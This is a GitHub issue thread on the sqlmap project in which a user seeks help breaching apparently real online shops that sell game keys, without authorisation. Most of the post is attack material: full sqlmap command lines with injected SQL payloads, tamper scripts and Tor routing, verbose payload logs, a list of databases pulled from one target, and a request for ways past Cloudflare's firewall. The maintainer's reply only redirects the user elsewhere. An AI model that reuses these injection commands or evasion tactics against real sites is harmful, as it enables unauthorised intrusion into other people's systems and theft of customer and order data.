### ISSUE TITLE
Issues Report (maybe Error in actually version)Screenshot intext

### ISSUE THREAD

**Issue by Taareck89** [sqlmapproject/sqlmap#3359]
Hey Guys, listen easy Bug Report try to bypass that stupid Cloudflare and cannot read the database because output was an 403 Forbidden. (protected by Cloudflare) if ill open in Browser, the Response is 404 File not Found (Injection in this ) Here´s sqlmap:

C:\Users\Tareck\Desktop\sqlmapproject-sqlmap-db5ae9a>sqlmap.py -u "http://www.Awesomewebsite.de/deal.php?action=add_product" --data="products_qty=1&products_id=46734&products_title=Fire&products_cover=http://static1.Awesomewebsite.com/ga/images/product_images/46734/images/covers/thumbnail200.jpg&products_os=XWsp&products_url=http://www.Awesomewebsite.de/download/Fire.html' OR MAKE_SET(6398=6398,1740) OR 'arGQ'='&products_shippingtype=Digital per E-Mail&products_button=Buy&productBuyButton=HRFI" --level 5 --risk 3 --user-agent="Mozilla 5" -p products_url "--header=User-Agent: Opera" --cookie=security=low --dbs --no-cast --drop-set-cookie  --dbs  --tamper=between,space2dash,randomcase -v 3 --tor  --fresh-queries
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.10.39#dev}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:58:58

[21:58:58] [DEBUG] cleaning up configuration parameters
[21:58:58] [WARNING] increasing default value for option '--time-sec' to 10 because switch '--tor' was provided
[21:58:58] [INFO] setting Tor SOCKS proxy settings
[21:58:59] [INFO] loading tamper module 'between'
[21:58:59] [INFO] loading tamper module 'space2dash'
[21:58:59] [INFO] loading tamper module 'randomcase'
it appears that you might have mixed the order of tamper scripts. Do you want to auto resolve this? [Y/n/q] y
[21:59:02] [DEBUG] setting the HTTP timeout
[21:59:02] [DEBUG] setting the HTTP Cookie header
[21:59:02] [DEBUG] setting the HTTP User-Agent header
[21:59:02] [DEBUG] creating HTTP requests opener object
[21:59:02] [DEBUG] setting the HTTP Referer header to the target URL
[21:59:02] [DEBUG] setting the HTTP Host header to the target URL
[21:59:02] [DEBUG] provided parameter 'products_url' is not inside the GET
[21:59:02] [WARNING] it appears that you have provided tainted parameter values ('products_url=http://www.Awesomewebsite.de/download/Fire.html' OR MAKE_SET(6398=6398,1740) OR 'arGQ'='') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[21:59:03] [DEBUG] provided parameter 'products_url' is not inside the Cookie
[21:59:03] [INFO] resuming back-end DBMS 'mysql'
[21:59:03] [INFO] testing connection to the target URL
[21:59:04] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 301 redirect to 'https://www.Awesomewebsite.de/Deal.php?action=add_product'. Do you want to follow? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: products_url (POST)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: products_qty=1&products_id=46734&products_title=Fire&products_cover=http://static1.Awesomewebsite.com/ga/images/product_images/46734/images/covers/thumbnail200.jpg&products_os=XWsp&products_url=-9792' OR MAKE_SET(6398=6398,1740) OR 'arGQ'='yYOX&products_shippingtype=Digital per E-Mail&products_button=Kaufen&productBuyButton=HRFI
    Vector: OR MAKE_SET([INFERENCE],[RANDNUM])
---
[21:59:05] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:59:05] [INFO] testing MySQL
[21:59:05] [PAYLOAD] -1033
[21:59:06] [PAYLOAD] -4475'--HvSqzSYOkGU%0AoR--phVRTjrox%0AMAKE_SET(QUARTER(NUll)--DCkqlBjmfS%0AiS--CqUXTZfCE%0ANUll,1636)--ieNomZ%0AoR--uveplEfFAJ%0A'ewij'='ZzOW
[21:59:06] [WARNING] the back-end DBMS is not MySQL
[21:59:06] [INFO] testing Oracle
[21:59:06] [PAYLOAD] -4112'--ZtNCmp%0AoR--sIzFLO%0AMAKE_SET(LENGTH(SYSDATE)=LENGTH(SYSDATE),4363)--WcjUXN%0AoR--NnijEr%0A'hjpx'='ZyZF
[21:59:06] [WARNING] identified ('Oracle') and fingerprinted ('MySQL') DBMSes differ. If you experience problems in enumeration phase please rerun with '--flush-session'
[21:59:07] [WARNING] the back-end DBMS is not Oracle
[21:59:07] [INFO] testing PostgreSQL
[21:59:07] [PAYLOAD] -6040'--ODZVsPt%0AoR--LqQPVpSyvehK%0AMAKE_SET(QUOTE_IDENT(NUlL)--PBXfAtOXBKc%0AIs--AUDmstbyPgNE%0ANUlL,4701)--JjDWqZF%0AoR--qwiGCubCoXN%0A'kzEW'='BwFb
[21:59:07] [WARNING] identified ('PostgreSQL') and fingerprinted ('MySQL') DBMSes differ. If you experience problems in enumeration phase please rerun with '--flush-session'
[21:59:07] [WARNING] the back-end DBMS is not PostgreSQL
[21:59:07] [INFO] testing Microsoft SQL Server
[21:59:07] [PAYLOAD] -3394'--eCsSquBtqpN%0AoR--NGUAxfFp%0AMAKE_SET(UNICODE(SQUARE(nUlL))--ksEZPK%0AiS--DGuHYSfXgXW%0AnUlL,3862)--xeliLaAH%0AoR--mqlBXneKPZ%0A'Kksf'='UlBz
[21:59:07] [WARNING] identified ('Microsoft SQL Server') and fingerprinted ('MySQL') DBMSes differ. If you experience problems in enumeration phase please rerun with '--flush-session'
[21:59:07] [WARNING] the back-end DBMS is not Microsoft SQL Server
[21:59:07] [INFO] testing SQLite
[21:59:07] [PAYLOAD] -4727'--dYBDksC%0AOr--NphFBLa%0AMAKE_SET(LAST_INSERT_ROWID()=LAST_INSERT_ROWID(),9735)--YPBjayL%0AOr--OopJIXcDfUF%0A'GIfF'='WIIT
[21:59:07] [WARNING] identified ('SQLite') and fingerprinted ('MySQL') DBMSes differ. If you experience problems in enumeration phase please rerun with '--flush-session'
[21:59:08] [DEBUG] declared web page charset 'utf-8'
[21:59:08] [DEBUG] got HTTP error code: 403 (Forbidden)
[21:59:08] [WARNING] potential CAPTCHA protection mechanism detected (CloudFlare)
[21:59:08] [DEBUG] setting match ratio for current parameter to 0.056
[21:59:08] [INFO] confirming SQLite
[21:59:08] [PAYLOAD] -2794'--lfNOjwPAqNi%0AoR--CTjeuvb%0AMAKE_SET(SQLITE_VERSION()=SQLITE_VERSION(),3986)--PJlQOm%0AoR--dkyfyc%0A'YPYL'='QyNe
[21:59:08] [DEBUG] got HTTP error code: 403 (Forbidden)
[21:59:08] [DEBUG] setting match ratio for current parameter to 0.056
[21:59:08] [INFO] actively fingerprinting SQLite
[21:59:08] [PAYLOAD] -8406'--zPnjnyvk%0AOr--PqhTyOdsnf%0AMAKE_SET(RaNDOMBLOB(-1)--zWluxUozgi%0ANOt--cofdeQ%0AbEtWeeN--PPLfxioTxS%0A0--GEhUsJcalg%0AaND--kgRiZViFj%0A0,3821)--uRpHkTxtN%0AOr--ZXAaawj%0A'PmfV'='YUeE
[21:59:09] [WARNING] there appears to be a high probability that this could be a false positive case
sqlmap previously fingerprinted back-end DBMS as MySQL. However now it has been fingerprinted as SQLite. Please, specify which DBMS should be correct [MySQL (default)/SQLite]
[21:59:13] [INFO] the back-end DBMS is MySQL
[21:59:13] [INFO] executing MySQL comment injection fingerprint
[21:59:13] [PAYLOAD] -7138'--NezpjDWgNK%0AOr--AyXWLpjyEVCA%0AMAKE_SET(5109=5109/*--kRAsTqSIpfQ%0ANoValue--WEoSrBZAF%0A*/,5109)--fCMmVGJmGmd%0AOr--AezrqCltlTM%0A'LUmx'='uayJ
[21:59:14] [WARNING] unable to perform MySQL comment injection
back-end DBMS: active fingerprint: MySQL
[21:59:14] [INFO] fetching database names
[21:59:14] [INFO] fetching number of databases
[21:59:14] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 2 times
[21:59:14] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)

[21:59:14] [DEBUG] running code integrity check
[21:59:14] [ERROR] wrong checksum of file 'C:\Users\Tareck\Desktop\sqlmapproject-sqlmap-db5ae9a\lib\core\settings.py' detected
[21:59:15] [CRITICAL] code integrity check failed (turning off automatic issue creation). You should retrieve the latest development version from official GitHub repository at 'https://github.com/sqlmapproject/sqlmap'

Traceback (most recent call last):
  File "C:\Users\Tareck\Desktop\sqlmapproject-sqlmap-db5ae9a\sqlmap.py", line 164, in main
    start()
  File "C:\Users\Tareck\Desktop\sqlmapproject-sqlmap-db5ae9a\lib\core\decorators.py", line 34, in _
    result = f(*args, **kwargs)
  File "C:\Users\Tareck\Desktop\sqlmapproject-sqlmap-db5ae9a\lib\controller\controller.py", line 658, in start
    action()
  File "C:\Users\Tareck\Desktop\sqlmapproject-sqlmap-db5ae9a\lib\controller\action.py", line 100, in action
    conf.dumper.dbs(conf.dbmsHandler.getDbs())
  File "C:\Users\Tareck\Desktop\sqlmapproject-sqlmap-db5ae9a\plugins\generic\databases.py", line 126, in getDbs
    query = rootQuery.blind.count
AttributeError: 'DictObject' object has no attribute 'blind'

[*] shutting down at 21:59:15

----------------------------------------------------------------------------------------------------------------
ok at this moment. what ive try to do to bypass reading google a lot of shit tuts to bypass Cloudflare bullshit nothings works. if some say u have to bypass manuall then tell me some how, or a Video, that works<--... if i try to bypass with Hackbar firefox like space to /**/ or WAF-Bypass method after 5-15 requests,response it 403 forbidden ... can some one help me out ? - try nearly all tamper scripts nothing works. ive become that injection from a guy he tell me it will works but at that moment my skill was like a newbie u know. now after 1 year i could need really little bit help.
-----------------------------------------------------------------------------------------------------------------
Here´s the Original Injection from him

http://www.Awesomewebsite.de/deal.php?action=add_product (POST)

sqlmap identified the following injection point(s) with a total of 355 HTTP(s) requests:
---
Parameter: products_url (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: products_qty=1&products_id=46734&products_title=Fire&products_cover=http://static1.Awesomewebsite.com/ga/images/product_images/46734/images/covers/thumbnail200.jpg&products_os=XWsp&products_url=http://www.Awesomewebsite.de/download/Fire.html%') AND 1761=1761 AND ('%'='&products_shippingtype=Digital per E-Mail&products_button=Kaufen&productBuyButton=HRFI
---
back-end DBMS: active fingerprint: MySQL Unknown
------------------------------------------------------------------------------------------------------------------
Another problem with another site with Cloudflare; same problem but was Time Based Blind.
Here a log from that same Guy who give me 3 sqlmap parameter

both sites are key sites - $$$$^^.50/50

python sqlmap.py -u "https://www.AwesomesiteKEYS/BTCS.de/create_account.php" 
back-end DBMS: MySQL 5.0.12
current database:    'awesomewebsiteKEYS'
available databases [7]:
[*] `game-accounts`
[*] `online-gold`
[*] `order`
[*] epvp
[*] information_schema
[*] AwesomesiteKEYS/BTCS
[*] newsletter

injection should by p country=81*
here the Originalposts but i cannot inject inside, but he sad The SQLI was still there. 1week ago.

python sqlmap.py -u "https://www.Awemsomewebsite.de/create_account.php" --timeout=8 --retries=2 --answers="do you want to skip those kind of cases=N,Do you want to keep testing the others=N,eventual further=N,threads=15,heck for the existenc=N,Do you want to resend original=N,follow=Y" --random-agent --no-cast --threads 10 --drop-set-cookie --current-db --cookie="security=low" --data="action=process&gender=m&firstname=&lastname=&email_address=753 Main Street&company=Acme-Hackme Corp.&vat=1234&street_address=753 Main Street&postcode=1234&city=Mystery&country=81*;&telephone=555-555-5555&fax=1234&password=&confirmation=Acme-Hackme Corp.&x=0&y=0" --dbms mysql --level 1
----------------------------------------------------------------------------------------------------------------
ill tested  the data on other sites like create_account.php some sites works with that injection.
but not this damn site both sites was XT C.
--------------------------------------------------
i think he didnt give me all of that injection. 2nd he tell me every 60seconds 1 requests, because there was Cloudflare, ok ill do --time-sec=60 only tested, 403 forbidden. 2nd try with --delay=60, no 403 forbidden. tried with tamper no chance. same shit, sqli works  he sad it to me 1week ago.

he will not give me help, because I should learn to understand everything but i dont have enough time to learn everything about sqlinjection holy. and SQL ;(

**Comment by stamparm** [comment]
This is a place for sqlmap related Issues. Please go to forums (e.g. hackforums) and ask such questions there

**Comment by abdilany6688-sys** [comment]
https://github.com/sqlmapproject/sqlmap/issues/3359
